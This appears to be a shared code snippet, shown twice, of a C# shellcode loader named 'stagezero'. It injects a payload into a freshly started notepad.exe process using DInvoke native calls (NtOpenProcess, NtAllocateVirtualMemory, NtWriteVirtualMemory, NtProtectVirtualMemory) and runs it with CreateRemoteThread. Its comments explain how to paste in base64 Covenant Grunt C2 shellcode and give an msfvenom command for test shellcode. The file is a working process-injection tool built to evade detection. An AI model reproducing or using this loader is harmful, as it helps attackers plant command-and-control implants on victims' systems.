ChoiSG · March 18, 2022 21:01
diff --git a/stagezero.cs b/stagezero.cs
 using System;
 using System.Runtime.InteropServices;
 using System.Diagnostics;
 using DynamicInvoke = DInvoke.DynamicInvoke;

 // Install DInvoke, Fody, and Costura Fody through Nuget 

 namespace stagezero
 {
    class Program
    {
        static void Main(string[] args)
        {
            // Covenant saves base64 shellcode launcher in opt/Covenant/Covenant/Data/Temp/<grunt_profile>.bin.b64  
            // Simply `xclip -selection c < opt/Covenant/Covenant/Data/Temp/GruntHTTP.bin.b64` and we are good to go! 
            string gruntx64 = "<your_grunt_base64ed_shellcode>";
            
            // Or you can just use a messagebox shellcode - msfvenom -a x64 --platform windows -p windows/x64/messagebox TEXT="hello world" -f csharp 
            // or w/e shellcode you like 
            byte[] sc = Convert.FromBase64String(gruntx64);

            var process = Process.Start("C:\\Windows\\System32\\notepad.exe");
            var pid = (uint)process.Id;
            Console.WriteLine("[+] Notepad pid: " + pid);

            IntPtr procHandle = DynamicInvoke.Native.NtOpenProcess(pid, DInvoke.Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_ALL_ACCESS);
            Console.WriteLine("[+] NtOpenProcess - Opening notepad processs");

            IntPtr baseAddr = IntPtr.Zero;
            IntPtr regionSize = (IntPtr)sc.Length;
            IntPtr alloc = DynamicInvoke.Native.NtAllocateVirtualMemory(procHandle, ref baseAddr, IntPtr.Zero, ref regionSize, 0x1000 | 0x2000, 0x04);
            Console.WriteLine("[+] NtAllocateVirtualMemory - Allocating memory: " + regionSize + " bytes");

            uint ntWVMemory = DynamicInvoke.Native.NtWriteVirtualMemory(procHandle, alloc, Marshal.UnsafeAddrOfPinnedArrayElement(sc, 0), (uint)sc.Length);
            Console.WriteLine("[+] NtWriteVirtualMemory - Writing shellcode to notepad.exe: 0x" + alloc.ToInt64().ToString("x2"));

            var ntPVMemory = DynamicInvoke.Native.NtProtectVirtualMemory(procHandle, ref alloc, ref regionSize, (uint)0x20);
            Console.WriteLine("[+] NtProtectVirtualMemory - Changing permission to RX");

            var pCreateRemoteThread = DynamicInvoke.Generic.GetLibraryAddress("kernel32.dll", "CreateRemoteThread");
            IntPtr threadId = IntPtr.Zero;
            var crtResult = DInvoke.DynamicInvoke.Win32.CreateRemoteThread(procHandle, IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, ref threadId);
            Console.WriteLine("[+] CreateRemoteThread - Starting shellcode...\n\n");
        }
    }

 }
	using System;
	using System.Runtime.InteropServices;
	using System.Diagnostics;
	using DynamicInvoke = DInvoke.DynamicInvoke;

	// Install DInvoke, Fody, and Costura Fody through Nuget

	namespace stagezero
	{
	class Program
	{
	static void Main(string[] args)
	{
	// Covenant saves base64 shellcode launcher in opt/Covenant/Covenant/Data/Temp/<grunt_profile>.bin.b64
	// Simply `xclip -selection c < opt/Covenant/Covenant/Data/Temp/GruntHTTP.bin.b64` and we are good to go!
	string gruntx64 = "<your_grunt_base64ed_shellcode>";

	// Or you can just use a messagebox shellcode - msfvenom -a x64 --platform windows -p windows/x64/messagebox TEXT="hello world" -f csharp
	// or w/e shellcode you like
	byte[] sc = Convert.FromBase64String(gruntx64);

	var process = Process.Start("C:\\Windows\\System32\\notepad.exe");
	var pid = (uint)process.Id;
	Console.WriteLine("[+] Notepad pid: " + pid);

	IntPtr procHandle = DynamicInvoke.Native.NtOpenProcess(pid, DInvoke.Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_ALL_ACCESS);
	Console.WriteLine("[+] NtOpenProcess - Opening notepad processs");

	IntPtr baseAddr = IntPtr.Zero;
	IntPtr regionSize = (IntPtr)sc.Length;
	IntPtr alloc = DynamicInvoke.Native.NtAllocateVirtualMemory(procHandle, ref baseAddr, IntPtr.Zero, ref regionSize, 0x1000 \| 0x2000, 0x04);
	Console.WriteLine("[+] NtAllocateVirtualMemory - Allocating memory: " + regionSize + " bytes");

	uint ntWVMemory = DynamicInvoke.Native.NtWriteVirtualMemory(procHandle, alloc, Marshal.UnsafeAddrOfPinnedArrayElement(sc, 0), (uint)sc.Length);
	Console.WriteLine("[+] NtWriteVirtualMemory - Writing shellcode to notepad.exe: 0x" + alloc.ToInt64().ToString("x2"));

	var ntPVMemory = DynamicInvoke.Native.NtProtectVirtualMemory(procHandle, ref alloc, ref regionSize, (uint)0x20);
	Console.WriteLine("[+] NtProtectVirtualMemory - Changing permission to RX");

	var pCreateRemoteThread = DynamicInvoke.Generic.GetLibraryAddress("kernel32.dll", "CreateRemoteThread");
	IntPtr threadId = IntPtr.Zero;
	var crtResult = DInvoke.DynamicInvoke.Win32.CreateRemoteThread(procHandle, IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, ref threadId);
	Console.WriteLine("[+] CreateRemoteThread - Starting shellcode...\n\n");
	}
	}

	}